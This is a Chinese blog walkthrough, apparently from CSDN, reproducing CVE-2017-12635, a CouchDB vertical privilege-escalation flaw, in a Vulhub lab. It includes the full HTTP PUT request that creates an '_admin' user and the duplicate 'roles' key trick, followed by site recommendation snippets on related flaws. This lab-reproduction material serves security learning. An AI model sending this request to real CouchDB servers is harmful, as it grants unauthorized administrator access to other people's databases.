Vulhub靶场Couchdb 垂直越权漏洞复现

最新推荐文章于 2024-05-15 18:00:00 发布
最新推荐文章于 2024-05-15 18:00:00 发布
阅读量202 收藏 2
点赞数
文章标签: couchdb 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_python321/article/details/132148562
版权

免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。

漏洞描述

Apache CouchDB是一个开源的 面向文档的 NoSQL数据库,用Erlang实现。CouchDB 使用多种格式和协议来存储、传输和处理其数据。它使用JSON来存储数据,使用JavaScript作为其使用MapReduce 的查询语言,并使用HTTP作为API。由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。CVE-2017-12635

漏洞影响版本

小于 1.7.0 以及 小于 2.1.1

漏洞复现版本

2.1.0

复现过程

1:使用vulhub中靶场启动环境

2:浏览器访问http://your-ip:5984/_utils 

3:burp中构建数据包如下,并发送 

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

 4:请求数据包中再添加一项"roles": ["  "]发送,返回包显示为true

5:使用此账号可成功登录

 

 

3ize0f
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
CouchDB垂直越权漏洞(CVE-2017-12635)
Kevin's Blog
07-24 1851
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 访问环境五、防御措施 一、漏洞原理 二、触发条件 三、漏洞场景 / 挖掘思路 四、漏洞复现 4.1 漏洞环境 4.2 启动环境 4.3 访问环境 五、防御措施 ...
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现
qq_45862635的博客
04-21 2758
前提:搭建好docker环境,安装vulhub 漏洞复现: 进入CVE-2017-12635漏洞目录,启动docker服务 service docker start 启动漏洞环境 sudo docker-compose up -d 查看容器状态,发现5984端口开启 sudo docker ps 访问localhost:5984/_utils/,查看环境是否搭建成功,如下图即成功搭建 构造发送一个正常的添加用户数据包 PUT /_users/org.couchdb.user:v
垂直越权漏洞与代码分析
最新发布
Z4400840的博客
05-15 1030
垂直越权漏洞与代码分析
Pikachu靶场越权漏洞详解
m0_46467017的博客
05-25 2561
Pikachu靶场越权漏洞详解前言逻辑越权漏洞简述漏洞描述漏洞原因漏洞分类水平越权垂直越权权限框架缺陷如何防御第一关 水平越权 前言 本篇文章用于巩固对自己文件上传漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu Unsafe Fileupload 不安全的文件上传(皮卡丘漏洞平台通关系列)) 链接: 逻辑越权漏洞 逻辑越权漏洞简述 漏洞描述 越权访问(Broken Access Control,BAC),指应用在检查授权时存在漏洞,使得攻击者在获得低权限用户账号后,利用一些方式绕
水平越权&垂直越权
weixin_54882883的博客
07-07 6840
1、水平越权-同级用户权限共享2、垂直越权-低高用户权限共享3、访问控制-验证丢失&取消验证&脆弱验证4、脆弱验证-Cookie&Token&Jwt等未包含引用验证代码文件等支持空口令,匿名,白名单等 发现urlh后面有个username参数,参数值对应的是用户名,我们尝试下别的用户名 漏洞浮现 我们现在要改的是把李四的名字改成苦苦我们现在越权把李四改成 麻子【麻子是存在的用户】那么这样就会越权把麻子改成苦苦这个工具他是burp中的一个工具他是一个半自动挖掘越权漏洞的工具首先啊这个复现的话需要两个账户
越权漏洞简介及靶场演示
seek_2022的博客
06-04 5193
信息安全行业关于权限有两个常见的概念,一个叫越权,一个叫提权。提权指的是低权限的用户通过技术手段提升到高权限的用户。(权限一般是指计算机权限,提权是指从用户权限提升到管理员权限)。越权一般是指低权限用户进行高权限的操作或平级操作,越权漏洞出现的地方一般以网页、app为主。 越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。 ...
靶场复现————平行越权垂直越权
weixin_46601374的博客
03-27 6417
什么是越权越权漏洞的概念 越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。 目前存在着两种越权操作类型:横向越权操作(水平越权)和纵向越权垂直越权)操作。 越权一般分为水平越权垂直越权。 水平越权是指相同权限下不同的用户可以互相访问 垂直越权是指使用权限低的用户可以访问到权限较高的用户 水平越权测试方法主要就是看看能否通过A用户操作影响到B用户 ...
详解越权漏洞
weixin_43025534的博客
05-22 2408
越权漏洞是指应用程序未对当前用户操作的身份权限进行严格校验,导致用户可以操作超出自己管理权限范围的功能,从而操作一些非该用户可以操作的行为。假设一个在线论坛应用程序,每个用户都有一个唯一的用户ID,并且用户可以通过URL访问他们自己的帖子。如果应用程序没有进行足够的验证和授权检查,就会错误地将Alice的角色更改为管理员,从而使她能够访问和执行与商品管理相关的操作。如果应用程序没有正确实施访问控制机制,没有验证用户的身份和权限,那么Bob将成功地通过URL参数访问到Alice的帖子。
couchdb:Kivik的CouchDB驱动程序
02-02
Kivik CouchDB 用于CouchDB驱动程序。 用法 该软件包提供了接口的实现。 您必须导入驱动程序,然后才能使用完整的 API。 请查阅以获取完整的文档和编码示例。 package main import ( "context" kivik "github....
fastify-couchdb:固定CouchDB连接插件
04-29
fastify-couchdb 固定CouchDB连接插件,使用它可以在服务器的每个部分共享相同的CouchDB连接。 在后台使用了流行的模块,将您传递给register的选项传递给了nano实例。 安装 npm i fastify-couchdb --save 用法 只...
apache-couchdb-2.3.1.zip
09-10
Apache CouchDB是一个开源的、基于文档的分布式数据库系统,它采用了JSON作为数据格式,并使用JavaScript进行查询和数据处理。在2.3.1版本中,CouchDB继续提供了一流的可扩展性和灵活性,适用于各种应用程序,特别是...
flycouchdbCouchDB的迁移工具
02-01
CouchDB数据库迁移工具——flycouchdb详解》 在大数据时代,数据库管理与迁移是开发者们常常面临的问题。CouchDB,一种基于JSON、JavaScript、RESTful和MapReduce的开源非关系型数据库,因其灵活性和分布式特性,...
pikachu靶场越权漏洞笔记
gyn2003的博客
03-02 1153
本章进行pikachu靶场越权漏洞的学习笔记记录
【甄选靶场Vulnhub百个项目渗透——项目四十七:Me-and-My-Girlfriend-1(水平越权
人间体佐菲的博客
10-23 416
【甄选靶场Vulnhub百个项目渗透——Me-and-My-Girlfriend-1(水平越权
pikachu靶场-8 越权漏洞
weixin_52180702的博客
12-13 964
由于没有对用户权限进行严格的判断,导致低权限的账号(比如普通用户)可以去完成高权限账号(比如超级管理员)范围内的操作平行越权:A用户和B用户属于同一级别用户,但各自不能操作对方个人信息,A用户如果越权操作B用户的个人信息的情况称为平行越权操作。垂直越权:A用户权限高于B用户,B用户越权操作A用户的权限的情况称为垂直越权越权漏洞属于逻辑漏洞,是由于权限校验的逻辑不够严谨导致的。每个应用系统其用户对应的权限是根据其业务功能划分的,而每个企业的业务又都是不一样的。
Web攻防作业 | 越权访问漏洞全解析
Ms08067安全实验室
11-24 1616
文章来源 | MS08067Web高级攻防第3期作业本文作者:xiaobai05050505越权访问漏洞一、越权漏洞概述1、概述通常情况下,一个 Web 程序功能流程是登录 - 提交请求 - 验证权限 - 数据库查询 - 返回结果。在验证权限阶段逻辑不够缜密,便会导致越权。(常见的程序都会认为通过登录后即可验证用户的身份,从而不会做下一步验证,最后导致越权。)2、分类①、未授权访问:没有某个功能...
CouchDB常用的漏洞利用方法
05-27
以下是一些常用的 CouchDB 漏洞利用方法: 1. 未授权访问漏洞:如果 CouchDB 未正确配置,攻击者可以轻易地访问和控制 CouchDB 服务器,从而获取敏感信息或造成破坏。 2. 认证绕过漏洞:攻击者可以利用某些漏洞或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值